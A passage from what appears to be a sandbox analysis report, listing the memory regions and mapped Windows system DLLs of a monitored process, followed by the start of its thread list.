"c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 1174 start_va = 0x73ae0000 end_va = 0x73b40fff monitored = 0 entry_point = 0x73b1bf40 region_type = mapped_file name = "wbemcomn2.dll" filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll") Region: id = 1175 start_va = 0x73bd0000 end_va = 0x73bd8fff monitored = 0 entry_point = 0x73bd1229 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 1176 start_va = 0x73fa0000 end_va = 0x73faefff monitored = 0 entry_point = 0x73fa125e region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 1177 start_va = 0x73fb0000 end_va = 0x73fbefff monitored = 0 entry_point = 0x73fb12a1 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1178 start_va = 0x73fc0000 end_va = 0x73fc8fff monitored = 0 entry_point = 0x73fc15a6 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1179 start_va = 0x73fd0000 end_va = 0x73fe0fff monitored = 0 entry_point = 0x73fd1300 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 1180 start_va = 0x740d0000 end_va = 0x740dcfff monitored = 0 entry_point = 0x740d11e0 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1181 start_va = 0x74b60000 end_va = 0x74b84fff monitored = 0 entry_point = 0x74b62b71 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") 
Region: id = 1182 start_va = 0x74c10000 end_va = 0x74c30fff monitored = 0 entry_point = 0x74c1145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 1183 start_va = 0x74fa0000 end_va = 0x74fa7fff monitored = 0 entry_point = 0x74fa34d3 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 1184 start_va = 0x75070000 end_va = 0x750aafff monitored = 0 entry_point = 0x7507128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1185 start_va = 0x750e0000 end_va = 0x7511efff monitored = 0 entry_point = 0x750e2351 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 1186 start_va = 0x75120000 end_va = 0x75141fff monitored = 0 entry_point = 0x751253e9 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 1187 start_va = 0x752d0000 end_va = 0x752e6fff monitored = 0 entry_point = 0x752d3573 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1188 start_va = 0x75400000 end_va = 0x75416fff monitored = 0 entry_point = 0x75403574 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1189 start_va = 0x756b0000 end_va = 0x756c8fff monitored = 0 entry_point = 0x756b1319 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 1190 start_va = 0x75720000 end_va = 
0x75727fff monitored = 0 entry_point = 0x757210e9 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 1191 start_va = 0x75740000 end_va = 0x7575afff monitored = 0 entry_point = 0x757493b9 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1192 start_va = 0x75760000 end_va = 0x7576bfff monitored = 0 entry_point = 0x757610e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1193 start_va = 0x757d0000 end_va = 0x757f8fff monitored = 0 entry_point = 0x757d6b19 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1194 start_va = 0x75800000 end_va = 0x7580dfff monitored = 0 entry_point = 0x75801235 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 1195 start_va = 0x75880000 end_va = 0x7588bfff monitored = 0 entry_point = 0x7588238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1196 start_va = 0x75920000 end_va = 0x7594efff monitored = 0 entry_point = 0x75922a35 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 1197 start_va = 0x75950000 end_va = 0x75a70fff monitored = 0 entry_point = 0x7595158e region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1198 start_va = 0x75a80000 end_va = 0x75aa6fff monitored = 0 entry_point = 
0x75a858b9 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1199 start_va = 0x75ab0000 end_va = 0x75afafff monitored = 0 entry_point = 0x75ab7e10 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1200 start_va = 0x75b00000 end_va = 0x75b11fff monitored = 0 entry_point = 0x75b01441 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 1201 start_va = 0x75ba0000 end_va = 0x75bedfff monitored = 0 entry_point = 0x75ba9c09 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1202 start_va = 0x75c50000 end_va = 0x75decfff monitored = 0 entry_point = 0x75c517e7 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 1203 start_va = 0x75df0000 end_va = 0x75e90fff monitored = 0 entry_point = 0x75e22433 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1204 start_va = 0x75ea0000 end_va = 0x75ebefff monitored = 0 entry_point = 0x75ea1355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1205 start_va = 0x75ec0000 end_va = 0x75f8bfff monitored = 0 entry_point = 0x75ec168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1206 start_va = 0x75f90000 end_va = 0x75f95fff monitored = 0 entry_point = 0x75f91782 region_type = mapped_file name = "nsi.dll" filename = 
"\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1207 start_va = 0x76000000 end_va = 0x76034fff monitored = 0 entry_point = 0x7600145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1208 start_va = 0x76040000 end_va = 0x76113fff monitored = 0 entry_point = 0x7608ce6f region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1209 start_va = 0x76130000 end_va = 0x761cffff monitored = 0 entry_point = 0x761449e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1210 start_va = 0x761d0000 end_va = 0x7626cfff monitored = 0 entry_point = 0x76203fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1211 start_va = 0x76270000 end_va = 0x7631bfff monitored = 0 entry_point = 0x7627a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1212 start_va = 0x76460000 end_va = 0x76478fff monitored = 0 entry_point = 0x76464975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1213 start_va = 0x76480000 end_va = 0x765dbfff monitored = 0 entry_point = 0x764cba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1214 start_va = 0x766e0000 end_va = 0x767a8fff monitored = 0 entry_point = 0x766fd711 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: 
"c:\\windows\\system32\\user32.dll") Region: id = 1215 start_va = 0x767b0000 end_va = 0x767b9fff monitored = 0 entry_point = 0x767b136c region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1216 start_va = 0x769c0000 end_va = 0x76a4efff monitored = 0 entry_point = 0x769c3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1217 start_va = 0x776d0000 end_va = 0x7780bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1218 start_va = 0x77810000 end_va = 0x77892fff monitored = 0 entry_point = 0x778123d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1219 start_va = 0x778b0000 end_va = 0x778f4fff monitored = 0 entry_point = 0x778b11e1 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 1220 start_va = 0x77910000 end_va = 0x77910fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1221 start_va = 0x7f6f0000 end_va = 0x7f7effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1222 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1223 start_va = 0x7ffd6000 end_va = 0x7ffd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: 
id = 1224 start_va = 0x7ffd7000 end_va = 0x7ffd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 1225 start_va = 0x7ffd8000 end_va = 0x7ffd8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 1226 start_va = 0x7ffd9000 end_va = 0x7ffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 1227 start_va = 0x7ffda000 end_va = 0x7ffdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 1228 start_va = 0x7ffdb000 end_va = 0x7ffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 1229 start_va = 0x7ffdc000 end_va = 0x7ffdcfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 1230 start_va = 0x7ffdd000 end_va = 0x7ffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 1231 start_va = 0x7ffde000 end_va = 0x7ffdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1232 start_va = 0x7ffdf000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1233 start_va = 0x6a770000 end_va = 0x6a78ffff monitored = 0 entry_point = 0x6a783f98 region_type = mapped_file name = "vsswmi.dll" filename = "\\Windows\\System32\\wbem\\vsswmi.dll" (normalized: "c:\\windows\\system32\\wbem\\vsswmi.dll") Region: id = 1234 start_va = 0x6dc30000 end_va = 0x6dd45fff monitored = 0 entry_point = 0x6dc31590 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 1235 start_va = 0x73bf0000 
end_va = 0x73c03fff monitored = 0 entry_point = 0x73bf1da9 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 1236 start_va = 0x6dc20000 end_va = 0x6dc2ffff monitored = 0 entry_point = 0x6dc21270 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 1237 start_va = 0x810000 end_va = 0x810fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1238 start_va = 0x8b0000 end_va = 0x8b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1239 start_va = 0x810000 end_va = 0x810fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1240 start_va = 0x8b0000 end_va = 0x8b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1241 start_va = 0x6c710000 end_va = 0x6c719fff monitored = 0 entry_point = 0x6c714aac region_type = mapped_file name = "vss_ps.dll" filename = "\\Windows\\System32\\vss_ps.dll" (normalized: "c:\\windows\\system32\\vss_ps.dll") Region: id = 1387 start_va = 0x800000 end_va = 0x800fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1388 start_va = 0x810000 end_va = 0x816fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" 
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1389 start_va = 0x800000 end_va = 0x800fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1390 start_va = 0x810000 end_va = 0x816fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1391 start_va = 0x800000 end_va = 0x800fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1392 start_va = 0x810000 end_va = 0x816fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1393 start_va = 0x800000 end_va = 0x800fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1394 start_va = 0x810000 end_va = 0x816fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1395 start_va = 0x800000 end_va = 0x800fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1396 start_va = 0x810000 end_va = 0x816fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: 
"c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1397 start_va = 0x800000 end_va = 0x800fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1398 start_va = 0x810000 end_va = 0x816fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1399 start_va = 0x800000 end_va = 0x800fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1400 start_va = 0x810000 end_va = 0x816fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1401 start_va = 0x800000 end_va = 0x800fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1402 start_va = 0x810000 end_va = 0x816fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1403 start_va = 0x800000 end_va = 0x800fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1404 start_va = 0x810000 end_va = 0x816fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1405 start_va = 0x800000 
end_va = 0x800fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1406 start_va = 0x810000 end_va = 0x816fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1407 start_va = 0x800000 end_va = 0x800fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1408 start_va = 0x810000 end_va = 0x816fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1409 start_va = 0x800000 end_va = 0x800fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1410 start_va = 0x810000 end_va = 0x816fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1411 start_va = 0x800000 end_va = 0x800fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1412 start_va = 0x810000 end_va = 0x816fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1413 start_va = 0x800000 end_va = 0x800fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = 
"tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1414 start_va = 0x810000 end_va = 0x816fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1415 start_va = 0x800000 end_va = 0x800fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1416 start_va = 0x810000 end_va = 0x816fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1417 start_va = 0x800000 end_va = 0x800fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1418 start_va = 0x810000 end_va = 0x816fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1419 start_va = 0x800000 end_va = 0x800fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1420 start_va = 0x810000 end_va = 0x816fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1421 start_va = 0x800000 end_va = 0x800fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: 
"c:\\windows\\system32\\tzres.dll") Region: id = 1422 start_va = 0x810000 end_va = 0x816fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1423 start_va = 0x800000 end_va = 0x800fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1424 start_va = 0x810000 end_va = 0x816fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1425 start_va = 0x800000 end_va = 0x800fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1426 start_va = 0x810000 end_va = 0x816fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1427 start_va = 0x800000 end_va = 0x800fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1428 start_va = 0x810000 end_va = 0x816fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1429 start_va = 0x800000 end_va = 0x800fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1430 start_va = 0x810000 end_va = 
0x816fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1431 start_va = 0x800000 end_va = 0x800fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1432 start_va = 0x810000 end_va = 0x816fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1433 start_va = 0x800000 end_va = 0x800fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1434 start_va = 0x810000 end_va = 0x816fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1435 start_va = 0x800000 end_va = 0x800fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1436 start_va = 0x810000 end_va = 0x816fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1437 start_va = 0x800000 end_va = 0x800fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1438 start_va = 0x810000 end_va = 0x816fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = 
"tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1439 start_va = 0x800000 end_va = 0x800fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1440 start_va = 0x810000 end_va = 0x816fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1441 start_va = 0x800000 end_va = 0x800fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1442 start_va = 0x810000 end_va = 0x816fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1521 start_va = 0x800000 end_va = 0x803fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 1522 start_va = 0xad0000 end_va = 0xb0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ad0000" filename = "" Region: id = 1581 start_va = 0x810000 end_va = 0x84ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000810000" filename = "" Thread: id = 66 os_tid = 0xd70 Thread: id = 67 os_tid = 0xd6c Thread: id = 68 os_tid = 0xd68 Thread: id = 69 